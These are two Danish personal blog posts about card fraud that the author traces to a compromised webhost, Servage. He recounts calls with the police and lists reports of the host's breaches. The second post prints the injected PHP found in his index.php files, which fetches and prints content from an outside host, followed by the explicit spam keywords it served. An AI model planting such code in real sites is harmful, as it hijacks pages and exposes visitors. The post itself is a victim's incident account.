Min søster skrev til mig her til aften om, at TV2 har skrevet noget på Tekst-TV omkring visakort-svindel i Tyskland. Det har jeg selvfølgelig undersøgt nærmere nu og minsandten om ikke et par af vores medier har skrevet om det.

TV2 har følgende artikel: Visa-kort i fare efter datatyveri

Politiken har denne artikel: Visakort-informationer stjålet

Det som jeg synes er yderst bemærkelsesværdigt er, at Søren Winge, pressechef for PBS, udtaler sig til Politiken, hvor han siger: "… at de endnu ikke hos PBS har været tvunget til at lukke nogle kort" . Jeg skal ikke kunne sige, hvad PBS's definition af "tvunget til at lukke nogle kort" er, men et eller andet sted synes jeg, at når mit kort blev spæret for online handel (pga. at det triggerede en early warning hos PBS), så var det ikke noget jeg bestemte. Kortet blev spærret for internethandler (ved halv et tiden om natten) og jeg blev ringet op af min egen "bank" ved middagstid, hvor jeg blev spurgt om jeg kendte til transaktionerne. Da jeg ikke ville kendes ved disse, så blev kortet helt spærret. Om det så var tvunget eller ej, det ved jeg ikke… Jeg var og er selvfølgelig glad for, at det blev spærret – det benægter jeg ikke… Men jeg synes nu ikke at Søren Winges udtalelse er heeelt korrekt.

Jeg vil ikke mene, at jeg er paranoid af natur og har mit visakort låst inde i en pengeboks, når jeg ikke bruger. Jeg vil også mene, at jeg har pænt styr på trojanske heste, keyloggers, spyware og andet "ondt" software, som intetanende ved et uheld kan få installeret på sin computer. Faktisk synes jeg, at jeg bruger mit kort med omtanke og har styr på de sikkerhedsmæssige aspekter både omkring omgang med visakortet og omkring ovennævnte software… og alligevel bliver mit visakort misbrugt!

Det er præcis sådan noget at "nogle" ikke vil have frem i medierne, da det kan få almindelige borgere til at blive bange for at handle online.. og med god grund. Jeg vil ikke male fanden på væggen, for det er trods alt første gang det sker for mig, til trods for at jeg har handlet online i adskillige år, såvel nationalt som internationalt. Der hvor problemet opstår og som jeg mener der skal slås ned på fra offentlig side, er hvor firmaer gemmer ens kortoplysninger og så automatisk trækker på kortet hver gang der skal betales noget. Dette er netop tilfældet ved servage.net, som er problemet i mit tilfælde (alt peger i hvert fald i den retning).

Desværre så findes der også danske firmaer (i hvert fald et som jeg har kendskab til), som bruger denne metode og det er endda den eneste metode man kan betale regninger på, til trods for at firmaet har en fysisk "butik". Jeg har dog kun haft gode erfaringer med dette firma, derfor vil jeg ikke hænge dem ud her. Deres sikkerhed virker også helt i top, så jeg har heller ingen betænkeligheder med at bruge dem igen.

Essensen af det hele er… Ja, hvad er den egentlig?

Brug dit kort med omtankte og prøv at undgå firmaer, hvor man aflevere kortoplsyninger direkte til firmaet og ikke til en officiel betalingsside, som er det mest normale. Jeg ved at vi har strenge krav til lagring af den slags oplysninger i Danmark, men i andre lande kan der være andre regler. Så når serverene er gennemhullede som en si ligesom hos servage.net, så er det altså mega nitten, at ens kortoplysninger ligger i deres database

Tags: fraud,hacked,hacker,hackning,host,pbs,politiken,servage,svindel,tv2,visa,webhost
Categories: blog
Comments Off

Så er vi kommet noget videre i sagen. Frank som har skrevet en kommentar spottede meget sent i nat, at vi begge bruger Servage som webhost og det var faktisk bare det stikord der skulle til. Efter en del googling og analysering af filer på mine sites, så er der nu ingen tvivl om, at jeg er blevet hacked (det samme gælder for Frank). Well, faktisk er det ikke 100% sikkert, at det er os der er blevet hacked – det er mere sandsynligt at det er selve serveren, hvor vi har vores domæner liggende.

Logger man ind i Servage kontrolpanel, så kan man ikke selv se sit indtastede kortnummer (kun de fire sidste cifre), så det er ikke den vej hackerne har fået adgang. Det bestyrke også mistanken om, at det er selve serveren der er blevet hacked og at "de" derfor har haft adgang til meget mere følsom data.

Ydermere så har Servage forbedret deres sikkerhed, ved dels at have ændret reglerne omkring passwords og dels ved at have installeret et såkaldt CAPTCHA-system d. 21. juni 2008. Begge forbedringer er sket relativt kort efter, at der har været meldinger om, at Servage igen er blevet hacked.

En anden "sjov" ting er, at jeg ringede til politiet (Station Amager) for at høre noget omkring en anmeldelse af det hele (vel at mærke før jeg vidst, at der var tale om Servage). Personen jeg talte med kunne ikke lige umiddelbart fortælle om det var noget jeg kunne anmelde eller om det var noget som skulle ske gennem banken. Han ringede derfor tilbage lidt senere og fortalte, at såfremt jeg ikke fysisk havde mistet mit kort, så var det ikke noget jeg kunne anmelde. Så det er op til min bank/PBS at gå videre den vej, hvis de vil det.

Frank har også ringet til politiet (Station City) og her fik de at vide, at det da helt klart kan (og skal) anmeldes – længere er den sag ikke.

Såeh… Er der virkelig så meget forskel i uddannelsen af Danmarks politi på Amager og på Halmtorvet?

En lille liste over hvad jeg lige umiddelbart kunne finde omkring dette:

15. februar 2008: Ændrede filer på Servage

7. marts 2008: Servage hacked: Exploit-Iframe (Trojan) Infection

26. marts 2008: Today I ended my Servage problems

18. maj 2008: Servage got hacked again

30. maj 2008: GoodBye Servage!

21. juni 2008: Servage angrebet – tjek dine index.php filer

Var der nogen der sagde ny webhost?

Mine index.php-filer er blevet ændret på to måder. Den ene er en total erstatnig af filen til:

if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?767");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://100500.muchcool.info/inc.php?767")); }
if($r) print $r;

… som henter nedenstående information:

anna nicole smith sex video free online 
sex video download free 
free long play sex video clip shaven pussey foam shaving 
free online indian sex video 
free sex video chat no credit card 
cell phone sex video 
free download sex video clips from free web sites 
free video download pinay assumption sex scandal video 
free adult sex chat online video 
free sex game video 
free online sex video bbs 

Heldigvis havde det site hvor ovenstående index.php-fil blev lavet også en default.php-fil, som indeholdte den rigtige startside. Der er med andre ord ikke gået noget kode tabt.

Den anden er en tilføjelse af links til den eksisterende index.php-fil:

...... .... ..... .. ....
......... ..... ......
... ...... ......... ......... ........
......... ........ ...... ......
...
.......... ..... .......
..... ..... .......

Listen er kortet betydeligt ned og linksne variere fra index.php-fil til index.php-fil.

I begge tilfælde er det relativt harmløst – faktisk er der blot indsat nogle links, som andre person ikke engang kan se. Spørgsmålet er bare, hvad har de ellers fået fat i følsomme data? Egentlig behøver der ikke være tale om en og samme person! Som der åbenbart ser ud, så er Servage hullet som en si, så det er jo nærmest gud og hver mand, der kan skaffe sig adgang til serverne.

Tags: fraud,hacked,hacker,hackning,host,index.php,injection,politi,servage,svindel,webhost
Categories: blog
9 Comments »